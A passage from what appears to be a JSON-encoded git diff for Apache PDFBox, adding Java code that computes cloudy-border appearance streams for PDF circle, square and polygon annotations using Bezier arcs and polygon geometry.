annotation.", - "+ * The ellipse is specified by the RD entry and the", - "+ * Rect entry that was passed in to the constructor.", - "+ *", - "+ * @param rd entry RD, or null if the entry does not exist", - "+ * @throws IOException If there is an error writing to the stream.", - "+ */", - "+ void createCloudyEllipse(PDRectangle rd) throws IOException", - "+ {", - "+ rectWithDiff = applyRectDiff(rd, 0);", - "+ double left = rectWithDiff.getLowerLeftX();", - "+ double bottom = rectWithDiff.getLowerLeftY();", - "+ double right = rectWithDiff.getUpperRightX();", - "+ double top = rectWithDiff.getUpperRightY();", - "+", - "+ cloudyEllipseImpl(left, bottom, right, top);", - "+ finish();", - "+ }", - "+", - "+ /**", - "+ * Returns the BBox entry (bounding box) for the", - "+ * appearance stream form XObject.", - "+ *", - "+ * @return Bounding box for appearance stream form XObject.", - "+ */", - "+ PDRectangle getBBox()", - "+ {", - "+ return getRectangle();", - "+ }", - "+", - "+ /**", - "+ * Returns the updated Rect entry for the annotation.", - "+ * The rectangle completely contains the cloudy border.", - "+ *", - "+ * @return Annotation Rect.", - "+ */", - "+ PDRectangle getRectangle()", - "+ {", - "+ return new PDRectangle((float)bboxMinX, (float)bboxMinY,", - "+ (float)(bboxMaxX - bboxMinX), (float)(bboxMaxY - bboxMinY));", - "+ }", - "+", - "+ /**", - "+ * Returns the Matrix entry for the appearance stream form XObject.", - "+ *", - "+ * @return Matrix for appearance stream form XObject.", - "+ */", - "+ AffineTransform getMatrix()", - "+ {", - "+ return AffineTransform.getTranslateInstance(-bboxMinX, -bboxMinY);", - "+ }", - "+", - "+ /**", - "+ * Returns the updated RD entry for Square and Circle annotations.", - "+ *", - "+ * @return Annotation RD value.", - "+ */", - "+ PDRectangle getRectDifference()", - "+ {", - "+ if (annotRect == null)", - "+ {", - "+ float d = (float)lineWidth / 2;", - "+ return new PDRectangle(d, d, (float)lineWidth, (float)lineWidth);", - "+ }", - "+", - "+ PDRectangle re = (rectWithDiff != null) ? rectWithDiff : annotRect;", - "+", - "+ float left = re.getLowerLeftX() - (float)bboxMinX;", - "+ float bottom = re.getLowerLeftY() - (float)bboxMinY;", - "+ float right = (float)bboxMaxX - re.getUpperRightX();", - "+ float top = (float)bboxMaxY - re.getUpperRightY();", - "+", - "+ return new PDRectangle(left, bottom, right - left, top - bottom);", - "+ }", - "+", - "+ private static double cosine(double dx, double hypot)", - "+ {", - "+ if (Double.compare(hypot, 0.0) == 0)", - "+ {", - "+ return 0;", - "+ }", - "+ return dx / hypot;", - "+ }", - "+", - "+ private static double sine(double dy, double hypot)", - "+ {", - "+ if (Double.compare(hypot, 0.0) == 0)", - "+ {", - "+ return 0;", - "+ }", - "+ return dy / hypot;", - "+ }", - "+", - "+ /**", - "+ * Cloudy rectangle implementation is based on converting the rectangle", - "+ * to a polygon.", - "+ */", - "+ private void cloudyRectangleImpl(double left, double bottom,", - "+ double right, double top, boolean isEllipse) throws IOException", - "+ {", - "+ double w = right - left, h = top - bottom;", - "+", - "+ if (intensity <= 0.0)", - "+ {", - "+ output.addRect((float)left, (float)bottom, (float)w, (float)h);", - "+ bboxMinX = left;", - "+ bboxMinY = bottom;", - "+ bboxMaxX = right;", - "+ bboxMaxY = top;", - "+ return;", - "+ }", - "+", - "+ // Make a polygon with direction equal to the positive angle direction.", - "+ Point2D.Double[] polygon;", - "+", - "+ if (w < 1.0)", - "+ {", - "+ polygon = new Point2D.Double[]", - "+ {", - "+ new Point2D.Double(left, bottom), new Point2D.Double(left, top),", - "+ new Point2D.Double(left, bottom)", - "+ };", - "+ }", - "+ else if (h < 1.0)", - "+ {", - "+ polygon = new Point2D.Double[]", - "+ {", - "+ new Point2D.Double(left, bottom), new Point2D.Double(right, bottom),", - "+ new Point2D.Double(left, bottom)", - "+ };", - "+ }", - "+ else", - "+ {", - "+ polygon = new Point2D.Double[]", - "+ {", - "+ new Point2D.Double(left, bottom), new Point2D.Double(right, bottom),", - "+ new Point2D.Double(right, top), new Point2D.Double(left, top),", - "+ new Point2D.Double(left, bottom)", - "+ };", - "+ }", - "+", - "+ cloudyPolygonImpl(polygon, isEllipse);", - "+ }", - "+", - "+ /**", - "+ * Cloudy polygon implementation.", - "+ *", - "+ * @param vertices polygon vertices; first and last point must be equal", - "+ * @param isEllipse specifies if the polygon represents an ellipse", - "+ */", - "+ private void cloudyPolygonImpl(Point2D.Double[] vertices, boolean isEllipse)", - "+ throws IOException", - "+ {", - "+ Point2D.Double[] polygon = removeZeroLengthSegments(vertices);", - "+ getPositivePolygon(polygon);", - "+ int numPoints = polygon.length;", - "+", - "+ if (numPoints < 2)", - "+ {", - "+ return;", - "+ }", - "+ if (intensity <= 0.0)", - "+ {", - "+ moveTo(polygon[0]);", - "+ for (int i = 1; i < numPoints; i++)", - "+ {", - "+ lineTo(polygon[i]);", - "+ }", - "+ return;", - "+ }", - "+", - "+ double cloudRadius = isEllipse ? getEllipseCloudRadius() : getPolygonCloudRadius();", - "+", - "+ if (cloudRadius < 0.5)", - "+ {", - "+ cloudRadius = 0.5;", - "+ }", - "+", - "+ final double k = Math.cos(ANGLE_34_DEG);", - "+ final double advIntermDefault = 2 * k * cloudRadius;", - "+ final double advCornerDefault = k * cloudRadius;", - "+ double[] array = new double[2];", - "+ double anglePrev = 0;", - "+", - "+ // The number of curls per polygon segment is hardly ever an integer,", - "+ // so the length of some curls must be adjustable. We adjust the angle", - "+ // of the trailing arc of corner curls and the leading arc of the first", - "+ // intermediate curl.", - "+ // In each polygon segment, we have n intermediate curls plus one half of a", - "+ // corner curl at each end. One of the n intermediate curls is adjustable.", - "+ // Thus the number of fixed (or unadjusted) intermediate curls is n - 1.", - "+", - "+ // Find the adjusted angle `alpha` for the first corner curl.", - "+ int n0 = computeParamsPolygon(advIntermDefault, advCornerDefault, k, cloudRadius,", - "+ polygon[numPoints - 2].distance(polygon[0]), array);", - "+ double alphaPrev = (n0 == 0) ? array[0] : ANGLE_34_DEG;", - "+", - "+ for (int j = 0; j + 1 < numPoints; j++)", - "+ {", - "+ Point2D.Double pt = polygon[j];", - "+ Point2D.Double ptNext = polygon[j + 1];", - "+ double length = pt.distance(ptNext);", - "+ if (Double.compare(length, 0.0) == 0)", - "+ {", - "+ alphaPrev = ANGLE_34_DEG;", - "+ continue;", - "+ }", - "+", - "+ // n is the number of intermediate curls in the current polygon segment.", - "+ int n = computeParamsPolygon(advIntermDefault, advCornerDefault, k,", - "+ cloudRadius, length, array);", - "+ if (n < 0)", - "+ {", - "+ if (!outputStarted)", - "+ {", - "+ moveTo(pt);", - "+ }", - "+ continue;", - "+ }", - "+", - "+ double alpha = array[0], dx = array[1];", - "+ double angleCur = Math.atan2(ptNext.y - pt.y, ptNext.x - pt.x);", - "+ if (j == 0)", - "+ {", - "+ Point2D.Double ptPrev = polygon[numPoints - 2];", - "+ anglePrev = Math.atan2(pt.y - ptPrev.y, pt.x - ptPrev.x);", - "+ }", - "+", - "+ double cos = cosine(ptNext.x - pt.x, length);", - "+ double sin = sine(ptNext.y - pt.y, length);", - "+ double x = pt.x;", - "+ double y = pt.y;", - "+", - "+ addCornerCurl(anglePrev, angleCur, cloudRadius, pt.x, pt.y, alpha,", - "+ alphaPrev, !outputStarted);", - "+ // Proceed to the center point of the first intermediate curl.", - "+ double adv = 2 * k * cloudRadius + 2 * dx;", - "+ x += adv * cos;", - "+ y += adv * sin;", - "+", - "+ // Create the first intermediate curl.", - "+ int numInterm = n;", - "+ if (n >= 1)", - "+ {", - "+ addFirstIntermediateCurl(angleCur, cloudRadius, alpha, x, y);", - "+ x += advIntermDefault * cos;", - "+ y += advIntermDefault * sin;", - "+ numInterm = n - 1;", - "+ }", - "+", - "+ // Create one intermediate curl and replicate it along the polygon segment.", - "+ Point2D.Double[] template = getIntermediateCurlTemplate(angleCur, cloudRadius);", - "+ for (int i = 0; i < numInterm; i++)", - "+ {", - "+ outputCurlTemplate(template, x, y);", - "+ x += advIntermDefault * cos;", - "+ y += advIntermDefault * sin;", - "+ }", - "+", - "+ anglePrev = angleCur;", - "+ alphaPrev = (n == 0) ? alpha : ANGLE_34_DEG;", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Computes parameters for a cloudy polygon: n, alpha, and dx.", - "+ */", - "+ private int computeParamsPolygon(double advInterm, double advCorner, double k,", - "+ double r, double length, double[] array)", - "+ {", - "+ if (Double.compare(length, 0.0) == 0)", - "+ {", - "+ array[0] = ANGLE_34_DEG;", - "+ array[1] = 0;", - "+ return -1;", - "+ }", - "+", - "+ // n is the number of intermediate curls in the current polygon segment", - "+ int n = (int) Math.ceil((length - 2 * advCorner) / advInterm);", - "+", - "+ // Fitting error along polygon segment", - "+ double e = length - (2 * advCorner + n * advInterm);", - "+ // Fitting error per each adjustable half curl", - "+ double dx = e / 2;", - "+", - "+ // Convert fitting error to an angle that can be used to control arcs.", - "+ double arg = (k * r + dx) / r;", - "+ double alpha = (arg < -1.0 || arg > 1.0) ? 0.0 : Math.acos(arg);", - "+", - "+ array[0] = alpha;", - "+ array[1] = dx;", - "+ return n;", - "+ }", - "+", - "+ /**", - "+ * Creates a corner curl for polygons and ellipses.", - "+ */", - "+ private void addCornerCurl(double anglePrev, double angleCur, double radius,", - "+ double cx, double cy, double alpha, double alphaPrev, boolean addMoveTo)", - "+ throws IOException", - "+ {", - "+ double a = anglePrev + ANGLE_180_DEG + alphaPrev;", - "+ double b = anglePrev + ANGLE_180_DEG + alphaPrev - Math.toRadians(22);", - "+ getArcSegment(a, b, cx, cy, radius, radius, null, addMoveTo);", - "+", - "+ a = b;", - "+ b = angleCur - alpha;", - "+ getArc(a, b, radius, radius, cx, cy, null, false);", - "+ }", - "+", - "+ /**", - "+ * Generates the first intermediate curl for a cloudy polygon.", - "+ */", - "+ private void addFirstIntermediateCurl(double angleCur, double r, double alpha,", - "+ double cx, double cy) throws IOException", - "+ {", - "+ final double D = Math.toRadians(30);", - "+ double a = angleCur + ANGLE_180_DEG;", - "+", - "+ getArcSegment(a + alpha, a + alpha - D, cx, cy, r, r, null, false);", - "+ getArcSegment(a + alpha - D, a + ANGLE_90_DEG, cx, cy, r, r, null, false);", - "+ getArcSegment(a + ANGLE_90_DEG, a + ANGLE_180_DEG - ANGLE_34_DEG,", - "+ cx, cy, r, r, null, false);", - "+ }", - "+", - "+ /**", - "+ * Returns a template for intermediate curls in a cloudy polygon.", - "+ */", - "+ private Point2D.Double[] getIntermediateCurlTemplate(double angleCur, double r)", - "+ throws IOException", - "+ {", - "+ ArrayList points = new ArrayList<>();", - "+ double a = angleCur + ANGLE_180_DEG;", - "+", - "+ getArcSegment(a + ANGLE_34_DEG, a + ANGLE_12_DEG, 0, 0, r, r, points, false);", - "+ getArcSegment(a + ANGLE_12_DEG, a + ANGLE_90_DEG, 0, 0, r, r, points, false);", - "+ getArcSegment(a + ANGLE_90_DEG, a + ANGLE_180_DEG - ANGLE_34_DEG,", - "+ 0, 0, r, r, points, false);", - "+", - "+ return points.toArray(new Point2D.Double[points.size()]);", - "+ }", - "+", - "+ /**", - "+ * Writes the curl template points to the output and applies translation (x, y).", - "+ */", - "+ private void outputCurlTemplate(Point2D.Double[] template, double x, double y)", - "+ throws IOException", - "+ {", - "+ int n = template.length, i = 0;", - "+ if ((n % 3) == 1)", - "+ {", - "+ Point2D.Double a = template[0];", - "+ moveTo(a.x + x, a.y + y);", - "+ i++;", - "+ }", - "+ for (; i + 2 < n; i += 3)", - "+ {", - "+ Point2D.Double a = template[i];", - "+ Point2D.Double b = template[i + 1];", - "+ Point2D.Double c = template[i + 2];", - "+ curveTo(a.x + x, a.y + y, b.x + x, b.y + y, c.x + x, c.y + y);", - "+ }", - "+ }", - "+", - "+ private PDRectangle applyRectDiff(PDRectangle rd, double min)", - "+ {", - "+ float rectLeft = annotRect.getLowerLeftX();", - "+ float rectBottom = annotRect.getLowerLeftY();", - "+ float rectRight = annotRect.getUpperRightX();", - "+ float rectTop = annotRect.getUpperRightY();", - "+", - "+ // Normalize", - "+ rectLeft = Math.min(rectLeft, rectRight);", - "+ rectBottom = Math.min(rectBottom, rectTop);", - "+ rectRight = Math.max(rectLeft, rectRight);", - "+ rectTop = Math.max(rectBottom, rectTop);", - "+", - "+ double rdLeft, rdBottom, rdRight, rdTop;", - "+", - "+ if (rd != null)", - "+ {", - "+ rdLeft = Math.max(rd.getLowerLeftX(), min);", - "+ rdBottom = Math.max(rd.getLowerLeftY(), min);", - "+ rdRight = Math.max(rd.getUpperRightX(), min);", - "+ rdTop = Math.max(rd.getUpperRightY(), min);", - "+ }", - "+ else", - "+ {", - "+ rdLeft = min;", - "+ rdBottom = min;", - "+ rdRight = min;", - "+ rdTop = min;", - "+ }", - "+", - "+ rectLeft += rdLeft;", - "+ rectBottom += rdBottom;", - "+ rectRight -= rdRight;", - "+ rectTop -= rdTop;", - "+", - "+ return new PDRectangle(rectLeft, rectBottom, rectRight - rectLeft, rectTop - rectBottom);", - "+ }", - "+", - "+ private void reversePolygon(Point2D.Double[] points)", - "+ {", - "+ int len = points.length;", - "+ int n = len / 2;", - "+ for (int i = 0; i < n; i++)", - "+ {", - "+ int j = len - i - 1;", - "+ Point2D.Double pi = points[i];", - "+ Point2D.Double pj = points[j];", - "+ points[i] = pj;", - "+ points[j] = pi;", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Makes a polygon whose direction is the same as the positive angle", - "+ * direction in the coordinate system.", - "+ * The polygon must not intersect itself.", - "+ */", - "+ private void getPositivePolygon(Point2D.Double[] points)", - "+ {", - "+ if (getPolygonDirection(points) < 0)", - "+ {", - "+ reversePolygon(points);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Returns the direction of the specified polygon.", - "+ * A positive value indicates that the polygon's direction is the same as the", - "+ * direction of positive angles in the coordinate system.", - "+ * A negative value indicates the opposite direction.", - "+ *", - "+ * The polygon must not intersect itself. A 2-point polygon is not acceptable.", - "+ * This is based on the \"shoelace formula\".", - "+ */", - "+ private double getPolygonDirection(Point2D.Double[] points)", - "+ {", - "+ double a = 0;", - "+ int len = points.length;", - "+ for (int i = 0; i < len; i++)", - "+ {", - "+ int j = (i + 1) % len;", - "+ a += points[i].x * points[j].y - points[i].y * points[j].x;", - "+ }", - "+ return a;", - "+ }", - "+", - "+ /**", - "+ * Creates one or more Bezier curves that represent an elliptical arc.", - "+ * Angles are in radians.", - "+ * The arc will always proceed in the positive angle direction.", - "+ * If the argument `out` is null, this writes the results to the instance", - "+ * variable `output`.", - "+ */", - "+ private void getArc(double startAng, double endAng, double rx, double ry,", - "+ double cx, double cy, ArrayList out, boolean addMoveTo) throws IOException", - "+ {", - "+ final double angleIncr = Math.PI / 2;", - "+ double startx = rx * Math.cos(startAng) + cx;", - "+ double starty = ry * Math.sin(startAng) + cy;", - "+", - "+ double angleTodo = endAng - startAng;", - "+ while (angleTodo < 0)", - "+ {", - "+ angleTodo += 2 * Math.PI;", - "+ }", - "+ double sweep = angleTodo, angleDone = 0;", - "+", - "+ if (addMoveTo)", - "+ {", - "+ if (out != null)", - "+ {", - "+ out.add(new Point2D.Double(startx, starty));", - "+ }", - "+ else", - "+ {", - "+ moveTo(startx, starty);", - "+ }", - "+ }", - "+", - "+ while (angleTodo > angleIncr)", - "+ {", - "+ getArcSegment(startAng + angleDone,", - "+ startAng + angleDone + angleIncr, cx, cy, rx, ry, out, false);", - "+ angleDone += angleIncr;", - "+ angleTodo -= angleIncr;", - "+ }", - "+", - "+ if (angleTodo > 0)", - "+ {", - "+ getArcSegment(startAng + angleDone, startAng + sweep, cx, cy, rx, ry, out, false);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Creates a single Bezier curve that represents a section of an elliptical", - "+ * arc. The sweep angle of the section must not be larger than 90 degrees.", - "+ * If argument `out` is null, this writes the results to the instance", - "+ * variable `output`.", - "+ */", - "+ private void getArcSegment(double startAng, double endAng, double cx, double cy,", - "+ double rx, double ry, ArrayList out, boolean addMoveTo) throws IOException", - "+ {", - "+ // Algorithm is from the FAQ of the news group comp.text.pdf", - "+", - "+ double cos_a = Math.cos(startAng);", - "+ double sin_a = Math.sin(startAng);", - "+ double cos_b = Math.cos(endAng);", - "+ double sin_b = Math.sin(endAng);", - "+ double denom = Math.sin((endAng - startAng) / 2.0);", - "+ if (Double.compare(denom, 0.0) == 0)", - "+ {", - "+ // This can happen only if endAng == startAng.", - "+ // The arc sweep angle is zero, so we create no arc at all.", - "+ if (addMoveTo)", - "+ {", - "+ double xs = cx + rx * cos_a;", - "+ double ys = cy + ry * sin_a;", - "+ if (out != null)", - "+ {", - "+ out.add(new Point2D.Double(xs, ys));", - "+ }", - "+ else", - "+ {", - "+ moveTo(xs, ys);", - "+ }", - "+ }", - "+ return;", - "+ }", - "+ double bcp = 1.333333333 * (1 - Math.cos((endAng - startAng) / 2.0)) / denom;", - "+ double p1x = cx + rx * (cos_a - bcp * sin_a);", - "+ double p1y = cy + ry * (sin_a + bcp * cos_a);", - "+ double p2x = cx + rx * (cos_b + bcp * sin_b);", - "+ double p2y = cy + ry * (sin_b - bcp * cos_b);", - "+ double p3x = cx + rx * cos_b;", - "+ double p3y = cy + ry * sin_b;", - "+", - "+ if (addMoveTo)", - "+ {", - "+ double xs = cx + rx * cos_a;", - "+ double ys = cy + ry * sin_a;", - "+ if (out != null)", - "+ {", - "+ out.add(new Point2D.Double(xs, ys));", - "+ }", - "+ else", - "+ {", - "+ moveTo(xs, ys);", - "+ }", - "+ }", - "+", - "+ if (out != null)", - "+ {", - "+ out.add(new Point2D.Double(p1x, p1y));", - "+ out.add(new Point2D.Double(p2x, p2y));", - "+ out.add(new Point2D.Double(p3x, p3y));", - "+ }", - "+ else", - "+ {", - "+ curveTo(p1x, p1y, p2x, p2y, p3x, p3y);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Flattens an ellipse into a polygon.", - "+ */", - "+ private static Point2D.Double[] flattenEllipse(double left, double bottom,", - "+ double right, double top)", - "+ {", - "+ Ellipse2D.Double ellipse = new Ellipse2D.Double(left, bottom, right - left, top - bottom);", - "+ final double flatness = 0.50;", - "+ PathIterator iterator = ellipse.getPathIterator(null, flatness);", - "+ double[] coords = new double[6];", - "+ ArrayList points = new ArrayList<>();", - "+", - "+ while (!iterator.isDone())", - "+ {", - "+ switch (iterator.currentSegment(coords))", - "+ {", - "+ case PathIterator.SEG_MOVETO:", - "+ case PathIterator.SEG_LINETO:", - "+ points.add(new Point2D.Double(coords[0], coords[1]));", - "+ break;", - "+ // Curve segments are not expected because the path iterator is", - "+ // flattened. SEG_CLOSE can be ignored.", - "+ }", - "+ iterator.next();", - "+ }", - "+", - "+ int size = points.size();", - "+ final double closeTestLimit = 0.05;", - "+", - "+ if (size >= 2 && points.get(size - 1).distance(points.get(0)) > closeTestLimit)", - "+ {", - "+ points.add(points.get(points.size() - 1));", - "+ }", - "+ return points.toArray(new Point2D.Double[points.size()]);", - "+ }", - "+", - "+ /**", - "+ * Cloudy ellipse implementation.", - "+ */", - "+ private void cloudyEllipseImpl(final double leftOrig, final double bottomOrig,", - "+ final double rightOrig, final double topOrig) throws IOException", - "+ {", - "+ if (intensity <= 0.0)", - "+ {", - "+ drawBasicEllipse(leftOrig, bottomOrig, rightOrig, topOrig);", - "+ return;", - "+ }", - "+", - "+ double left = leftOrig, bottom = bottomOrig, right = rightOrig, top = topOrig;", - "+ double width = right - left, height = top - bottom;", - "+ double cloudRadius = getEllipseCloudRadius();", - "+", - "+ // Omit cloudy border if the ellipse is very small.", - "+ final double threshold1 = 0.50 * cloudRadius;", - "+ if (width < threshold1 && height < threshold1)", - "+ {", - "+ drawBasicEllipse(left, bottom, right, top);", - "+ return;", - "+ }", - "+", - "+ // Draw a cloudy rectangle instead of an ellipse when the", - "+ // width or height is very small.", - "+ final double threshold2 = 5;", - "+ if ((width < threshold2 && height > 20) || (width > 20 && height < threshold2))", - "+ {", - "+ cloudyRectangleImpl(left, bottom, right, top, true);", - "+ return;", - "+ }", - "+", - "+ // Decrease radii (while center point does not move). This makes the", - "+ // \"tails\" of the curls almost touch the ellipse outline.", - "+ double radiusAdj = Math.sin(ANGLE_12_DEG) * cloudRadius - 1.50;", - "+ if (width > 2 * radiusAdj)", - "+ {", - "+ left += radiusAdj;", - "+ right -= radiusAdj;", - "+ }", - "+ else", - "+ {", - "+ double mid = (left + right) / 2;", - "+ left = mid - 0.10;", - "+ right = mid + 0.10;", - "+ }", - "+ if (height > 2 * radiusAdj)", - "+ {", - "+ top -= radiusAdj;", - "+ bottom += radiusAdj;", - "+ }", - "+ else", - "+ {", - "+ double mid = (top + bottom) / 2;", - "+ top = mid + 0.10;", - "+ bottom = mid - 0.10;", - "+ }", - "+", - "+ // Flatten the ellipse into a polygon. The segment lengths of the flattened", - "+ // result don't need to be extremely short because the loop below is able to", - "+ // interpolate between polygon points when it computes the center points", - "+ // at which each curl is placed.", - "+", - "+ Point2D.Double[] flatPolygon = flattenEllipse(left, bottom, right, top);", - "+ int numPoints = flatPolygon.length;", - "+ if (numPoints < 2)", - "+ {", - "+ return;", - "+ }", - "+", - "+ double totLen = 0;", - "+ for(int i = 1; i < numPoints; i++){", - "+ totLen += flatPolygon[i - 1].distance(flatPolygon[i]);", - "+ }", - "+", - "+ final double k = Math.cos(ANGLE_34_DEG);", - "+ double curlAdvance = 2 * k * cloudRadius;", - "+ int n = (int) Math.ceil(totLen / curlAdvance);", - "+ if (n < 2)", - "+ {", - "+ drawBasicEllipse(leftOrig, bottomOrig, rightOrig, topOrig);", - "+ return;", - "+ }", - "+", - "+ curlAdvance = totLen / n;", - "+ cloudRadius = curlAdvance / (2 * k);", - "+", - "+ if (cloudRadius < 0.5)", - "+ {", - "+ cloudRadius = 0.5;", - "+ curlAdvance = 2 * k * cloudRadius;", - "+ }", - "+ else if (cloudRadius < 3.0)", - "+ {", - "+ // Draw a small circle when the scaled radius becomes very small.", - "+ // This happens also if intensity is much smaller than 1.", - "+ drawBasicEllipse(leftOrig, bottomOrig, rightOrig, topOrig);", - "+ return;", - "+ }", - "+", - "+ // Construct centerPoints array, in which each point is the center point of a curl.", - "+ // The length of each centerPoints segment ideally equals curlAdv but that", - "+ // is not true in regions where the ellipse curvature is high.", - "+", - "+ int centerPointsLength = n;", - "+ Point2D.Double[] centerPoints = new Point2D.Double[centerPointsLength];", - "+ int centerPointsIndex = 0;", - "+ double lengthRemain = 0;", - "+ final double comparisonToler = lineWidth * 0.10;", - "+", - "+ for (int i = 0; i + 1 < numPoints; i++)", - "+ {", - "+ Point2D.Double p1 = flatPolygon[i];", - "+ Point2D.Double p2 = flatPolygon[i + 1];", - "+ double dx = p2.x - p1.x, dy = p2.y - p1.y;", - "+ double length = p1.distance(p2);", - "+ if (Double.compare(length, 0.0) == 0)", - "+ {", - "+ continue;", - "+ }", - "+ double lengthTodo = length + lengthRemain;", - "+ if (lengthTodo >= curlAdvance - comparisonToler || i == numPoints - 2)", - "+ {", - "+ double cos = cosine(dx, length), sin = sine(dy, length);", - "+ double d = curlAdvance - lengthRemain;", - "+ do", - "+ {", - "+ double x = p1.x + d * cos;", - "+ double y = p1.y + d * sin;", - "+ if (centerPointsIndex < centerPointsLength)", - "+ {", - "+ centerPoints[centerPointsIndex++] = new Point2D.Double(x, y);", - "+ }", - "+ lengthTodo -= curlAdvance;", - "+ d += curlAdvance;", - "+ }", - "+ while (lengthTodo >= curlAdvance - comparisonToler);", - "+", - "+ lengthRemain = lengthTodo;", - "+ if (lengthRemain < 0)", - "+ {", - "+ lengthRemain = 0;", - "+ }", - "+ }", - "+ else", - "+ {", - "+ lengthRemain += length;", - "+ }", - "+ }", - "+", - "+ // Note: centerPoints does not repeat the first point as the last point", - "+ // to create a \"closing\" segment.", - "+", - "+ // Place a curl at each point of the centerPoints array.", - "+ // In regions where the ellipse curvature is high, the centerPoints segments", - "+ // are shorter than the actual distance along the ellipse. Thus we must", - "+ // again compute arc adjustments like in cloudy polygons.", - "+", - "+ numPoints = centerPointsIndex;", - "+ double anglePrev = 0, alphaPrev = 0;", - "+", - "+ for (int i = 0; i < numPoints; i++)", - "+ {", - "+ int idxNext = i + 1;", - "+ if (i + 1 >= numPoints)", - "+ {", - "+ idxNext = 0;", - "+ }", - "+ Point2D.Double pt = centerPoints[i];", - "+ Point2D.Double ptNext = centerPoints[idxNext];", - "+", - "+ if (i == 0)", - "+ {", - "+ Point2D.Double ptPrev = centerPoints[numPoints - 1];", - "+ anglePrev = Math.atan2(pt.y - ptPrev.y, pt.x - ptPrev.x);", - "+ alphaPrev = computeParamsEllipse(ptPrev, pt, cloudRadius, curlAdvance);", - "+ }", - "+", - "+ double angleCur = Math.atan2(ptNext.y - pt.y, ptNext.x - pt.x);", - "+ double alpha = computeParamsEllipse(pt, ptNext, cloudRadius, curlAdvance);", - "+", - "+ addCornerCurl(anglePrev, angleCur, cloudRadius, pt.x, pt.y, alpha,", - "+ alphaPrev, !outputStarted);", - "+", - "+ anglePrev = angleCur;", - "+ alphaPrev = alpha;", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Computes the alpha parameter for an ellipse curl.", - "+ */", - "+ private double computeParamsEllipse(Point2D.Double pt, Point2D.Double ptNext,", - "+ double r, double curlAdv)", - "+ {", - "+ double length = pt.distance(ptNext);", - "+ if (Double.compare(length, 0.0) == 0)", - "+ {", - "+ return ANGLE_34_DEG;", - "+ }", - "+", - "+ double e = length - curlAdv;", - "+ double arg = (curlAdv / 2 + e / 2) / r;", - "+ return (arg < -1.0 || arg > 1.0) ? 0.0 : Math.acos(arg);", - "+ }", - "+", - "+ private Point2D.Double[] removeZeroLengthSegments(Point2D.Double[] polygon)", - "+ {", - "+ int np = polygon.length;", - "+ if (np <= 2)", - "+ {", - "+ return polygon;", - "+ }", - "+", - "+ final double toler = 0.50;", - "+ int npNew = np;", - "+ Point2D.Double ptPrev = polygon[0];", - "+", - "+ // Don't remove the last point if it equals the first point.", - "+ for (int i = 1; i < np; i++)", - "+ {", - "+ Point2D.Double pt = polygon[i];", - "+ if (Math.abs(pt.x - ptPrev.x) < toler && Math.abs(pt.y - ptPrev.y) < toler)", - "+ {", - "+ polygon[i] = null;", - "+ npNew--;", - "+ }", - "+ ptPrev = pt;", - "+ }", - "+", - "+ if (npNew == np)", - "+ {", - "+ return polygon;", - "+ }", - "+", - "+ Point2D.Double[] polygonNew = new Point2D.Double[npNew];", - "+ int j = 0;", - "+ for (int i = 0; i < np; i++)", - "+ {", - "+ Point2D.Double pt = polygon[i];", - "+ if (pt != null)", - "+ {", - "+ polygonNew[j++] = pt;", - "+ }", - "+ }", - "+", - "+ return polygonNew;", - "+ }", - "+", - "+ /**", - "+ * Draws an ellipse without a cloudy border effect.", - "+ */", - "+ private void drawBasicEllipse(double left, double bottom, double right, double top)", - "+ throws IOException", - "+ {", - "+ double rx = Math.abs(right - left) / 2;", - "+ double ry = Math.abs(top - bottom) / 2;", - "+ double cx = (left + right) / 2;", - "+ double cy = (bottom + top) / 2;", - "+ getArc(0, 2 * Math.PI, rx, ry, cx, cy, null, true);", - "+ }", - "+", - "+ private void beginOutput(double x, double y) throws IOException", - "+ {", - "+ bboxMinX = x;", - "+ bboxMinY = y;", - "+ bboxMaxX = x;", - "+ bboxMaxY = y;", - "+ outputStarted = true;", - "+ // Set line join to bevel to avoid spikes", - "+ output.setLineJoinStyle(2);", - "+ }", - "+", - "+ private void updateBBox(double x, double y)", - "+ {", - "+ bboxMinX = Math.min(bboxMinX, x);", - "+ bboxMinY = Math.min(bboxMinY, y);", - "+ bboxMaxX = Math.max(bboxMaxX, x);", - "+ bboxMaxY = Math.max(bboxMaxY, y);", - "+ }", - "+", - "+ private void moveTo(Point2D.Double p) throws IOException", - "+ {", - "+ moveTo(p.x, p.y);", - "+ }", - "+", - "+ private void moveTo(double x, double y) throws IOException", - "+ {", - "+ if (outputStarted)", - "+ {", - "+ updateBBox(x, y);", - "+ }", - "+ else", - "+ {", - "+ beginOutput(x, y);", - "+ }", - "+", - "+ output.moveTo((float)x, (float)y);", - "+ }", - "+", - "+ private void lineTo(Point2D.Double p) throws IOException", - "+ {", - "+ lineTo(p.x, p.y);", - "+ }", - "+", - "+ private void lineTo(double x, double y) throws IOException", - "+ {", - "+ if (outputStarted)", - "+ {", - "+ updateBBox(x, y);", - "+ }", - "+ else", - "+ {", - "+ beginOutput(x, y);", - "+ }", - "+", - "+ output.lineTo((float)x, (float)y);", - "+ }", - "+", - "+ private void curveTo(double ax, double ay, double bx, double by, double cx, double cy)", - "+ throws IOException", - "+ {", - "+ updateBBox(ax, ay);", - "+ updateBBox(bx, by);", - "+ updateBBox(cx, cy);", - "+ output.curveTo((float)ax, (float)ay, (float)bx, (float)by, (float)cx, (float)cy);", - "+ }", - "+", - "+ private void finish() throws IOException", - "+ {", - "+ if (outputStarted)", - "+ {", - "+ output.closePath();", - "+ }", - "+", - "+ if (lineWidth > 0)", - "+ {", - "+ double d = lineWidth / 2;", - "+ bboxMinX -= d;", - "+ bboxMinY -= d;", - "+ bboxMaxX += d;", - "+ bboxMaxY += d;", - "+ }", - "+ }", - "+", - "+ private double getEllipseCloudRadius()", - "+ {", - "+ // Equation deduced from Acrobat Reader's appearance streams. Circle", - "+ // annotations have a slightly larger radius than Polygons and Squares.", - "+ return 4.75 * intensity + 0.5 * lineWidth;", - "+ }", - "+", - "+ private double getPolygonCloudRadius()", - "+ {", - "+ // Equation deduced from Acrobat Reader's appearance streams.", - "+ return 4 * intensity + 0.5 * lineWidth;", - "+ }", - "+}", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "index 4cd34e8dd..e6258467f 100644", - "--- 